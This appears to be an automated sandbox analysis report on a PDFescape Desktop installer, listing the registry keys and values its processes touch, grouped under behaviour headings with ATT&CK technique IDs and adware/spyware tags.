Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000	spoolsv.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Capabilities	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\DeviceDesc	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{f01fac5d-e5f6-485f-a8c6-27446425998c}\0002	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3b2ce006-5e61-4fde-bab8-9b8aac9b26df}\0002	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\ConfigFlags	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\HardwareID	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\HardwareID	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\FriendlyName	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0051	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009	svchost.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A	svchost.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

MsiExec.exeMsiExec.exeMsiExec.exebrowser_broker.exeMicrosoftEdge.exe

description	ioc	process
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\Compatibility Flags = "32776"	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar	MsiExec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00	MsiExec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}	MsiExec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\ActiveX Compatibility	MsiExec.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Toolbar\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462} = 00	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Toolbar	MsiExec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe

Modifies data under HKEY_USERS 36 IoCs

Processes:

spoolsv.exeprinter-installer-app.exemsiexec.exesvchost.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	printer-installer-app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\18	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Fax = "winspool,Ne02:"	spoolsv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\ChooseFile = "1"	printer-installer-app.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:"	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Printers\DevModePerUser	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft Print to PDF = "winspool,Ne01:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices\PDFescape Desktop = "winspool,Ne03:"	spoolsv.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Fax = "winspool,Ne02:,15,45"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft Print to PDF = "winspool,Ne01:"	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\PDFescape Desktop = "winspool,Ne03:,15,45"	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer	printer-installer-app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts\Microsoft XPS Document Writer = "winspool,Ne00:,15,45"	spoolsv.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop\PDF Printer\OpenAfterConversion = "1"	printer-installer-app.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\Devices	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\Devices\Microsoft XPS Document Writer = "winspool,Ne00:"	spoolsv.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows NT\CurrentVersion\PrinterPorts	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PDF Tools AG	spoolsv.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\PDFescape Desktop	printer-installer-app.exe

Modifies registry class 64 IoCs

Processes:

regsvr32.exemsiexec.exeMsiExec.exeupdater-ws.exeMsiExec.exeMsiExec.exews.exeMicrosoftEdge.exews.execreator-ws.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exeMsiExec.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9981C967-0000-4633-8737-F55C3CC344B0}\TypeLib	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Applications\PDFescape Desktop.exe	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktopWordPlugIn.Connect\CurVer	MsiExec.exe
Key created	\REGISTRY\MACHINE\Software\Classes\SystemFileAssociations\.wwf\shell\print.PDFescape Desktop	msiexec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0	updater-ws.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{681C8342-5595-4C45-A93A-4E6DB6A3999D}	updater-ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1540C90C-9AE0-4248-9CA9-664CA8BA03A8}\VersionIndependentProgID\ = "PDFescapeDesktop.PDFActiveDoc"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{A92F07A1-0000-40B0-AF9F-CCEFA34AB08E}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\TypeLib\Version = "1.0"	updater-ws.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{50F0F03A-D82F-4234-BA86-167887BB152C}\TypeLib	MsiExec.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9242C198-0000-4F73-935D-1C7905796C67}\Version	regsvr32.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{9E5B6507-754C-4EC8-93B3-F240C0AD05BF}\AccessPermission = 010014804c0000005c000000140000003000000002001c0001000000110014000400000001010000000000100010000002001c0001000000000014000b0000000101000000000001000000000102000000000005200000002002000001020000000000052000000020020000	ws.exe
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A4CB4452-0000-4D69-B194-10F00E72CF6B}\Version	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\60E3EBCC127EC014D863DEFE735F7634\ProductIcon = "C:\\Windows\\Installer\\{CCBE3E06-E721-410C-8D36-EDEF37F56743}\\create_icon"	msiexec.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1E81AD0B-0000-4107-9058-7CC9F66ACAA8}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6966A181-FCFE-49A0-84E0-D4A2E2457055}\ = "IActivationBridge"	ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A4B3E576-A94E-4868-B58A-A9945E47C203}\VersionIndependentProgID\ = "PDFescapeDesktopWordPlugIn.Connect"	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{E1A4EF6F-2D38-4065-A99E-2908CC9F31DF}\Programmable	creator-ws.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\TypedUrlsComplete = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{188419DA-30AB-4A88-BC26-66A045E23263}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{04B2C159-30AC-4E03-A303-00BA4EA26935}\TypeLib\ = "{159B9A1E-E6BA-4134-BBFC-A6C480193408}"	ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{3C0CF171-88CC-47E5-AB25-C93AFC0E7F9A}\TypeLib\Version = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{58996E59-0000-4D4E-8CEE-5B22F2107655}\TypeLib	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0179B7E8-0000-48EB-A99B-B1337DEB7F1E}\TypeLib\Version = "1.0"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\TypeLib\Version = "1.0"	updater-ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFPreviewer.1\CLSID\ = "{E6992C88-D2F2-4000-9B5C-C882FFBD5E7C}"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{15D3E51C-9254-4A6F-9677-BC32AC9EB05B}\TypeLib\Version = "1.0"	ws.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\Programmable	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B5F28CBA-CAF7-482E-88FD-437887EB08EF}\ = "StatVersionDll Class"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\PDFescapeDesktop.PDFActiveDoc.1\DocObject\	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F02D9237-5500-4BA6-A926-1B572AEAF3EB}\Programmable	ws.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{90E5A1BE-AB4B-4CF5-B84E-A2C8CFF0DAA5}\ProxyStubClsid32	ws.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{B070A15F-0000-411C-BAA4-424264999487}\Version	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766\main_feature = "product_feature"	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{CB4A1779-DC2F-4A26-BC44-29C109F7E72B}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	updater-ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}\Programmable	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{7F592843-0000-4833-9F47-F7332F3CB3F8}	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\ECAB801F0EC2B7449A35862E10F9B766	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{1B7DE006-0B8A-4120-8C7A-D21622ABBDDA}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop\\creator\\plugins\\IEAddin"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{09C4B9DD-0000-459D-934A-25EC1D0B234A}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\Version\ = "1.0"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0D73933D-0000-401D-9F25-5F1614CA7AC3}	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\pdfescape\URL Protocol	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{CFAEAEBC-97F0-4D09-89C9-B25F882DAB2C}\1.0\HELPDIR\ = "C:\\Program Files\\PDFescape Desktop"	updater-ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PDFIEPlugin.DLL\AppID = "{FB32CC69-DCE5-4191-9898-867A1F57CF0F}"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{322C09B5-0000-4267-8909-976D51F2FC41}\TypeLib\ = "{46D9BB0E-F2F3-4987-AAC2-4E97C53437B7}"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{159B9A1E-E6BA-4134-BBFC-A6C480193408}	ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{9E3CC75B-DB58-4223-8D1E-160BBEF0574E}\ProxyStubClsid32\ = "{00020420-0000-0000-C000-000000000046}"	ws.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{A6D4ADF0-4C82-4712-B9B8-69EE9CF06462}	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{A7F7470C-0000-4762-9613-155654B24238}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll"	regsvr32.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D3C28D54-72B8-4B8D-B204-157EFA9BF3E7}\InprocServer32	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\PDFIEHelper.PDFHelperBHO.1	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{B123B077-4FE5-4944-82C7-5765380D9783}\TypeLib	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{39E42990-0000-4230-9F81-62B537B6B839}\AppID = "{2BC47158-F746-4E22-B116-D481B09E9674}"	regsvr32.exe
Key created	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\.pdf	MsiExec.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{55C109C9-40DA-43D3-AB08-580A8C8C627F}\1.0\FLAGS	creator-ws.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{77A0A704-0000-4B96-B6F6-B635028FDFA4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	regsvr32.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{9AF15867-1D90-423B-9853-E99761714165}\VersionIndependentProgID\ = "PDFIEHelper.PDFHelperBHO"	MsiExec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{37DD0F6C-0000-46F2-8B21-3E4AB4750AFF}\InprocServer32\ = "C:\\ProgramData\\PDFescape Desktop\\Installation\\Statistics.dll"	regsvr32.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-0876022 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe

Modifies system certificate store 2 TTPs 5 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

PDFescape_Desktop_Installer.exe

description	ioc	process
